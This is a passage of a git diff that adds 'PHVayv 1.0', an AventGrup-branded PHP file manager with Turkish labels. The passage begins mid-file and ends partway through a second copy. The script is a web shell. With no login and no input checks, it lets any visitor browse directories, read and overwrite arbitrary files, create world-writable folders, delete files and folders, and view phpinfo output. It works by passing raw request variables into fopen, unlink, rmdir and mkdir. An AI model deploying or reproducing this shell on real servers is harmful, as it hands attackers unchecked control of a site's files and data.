+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/php/PH_Vayv.php b/php/PH_Vayv.php
new file mode 100644
index 0000000..b218778
--- /dev/null
+++ b/php/PH_Vayv.php
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
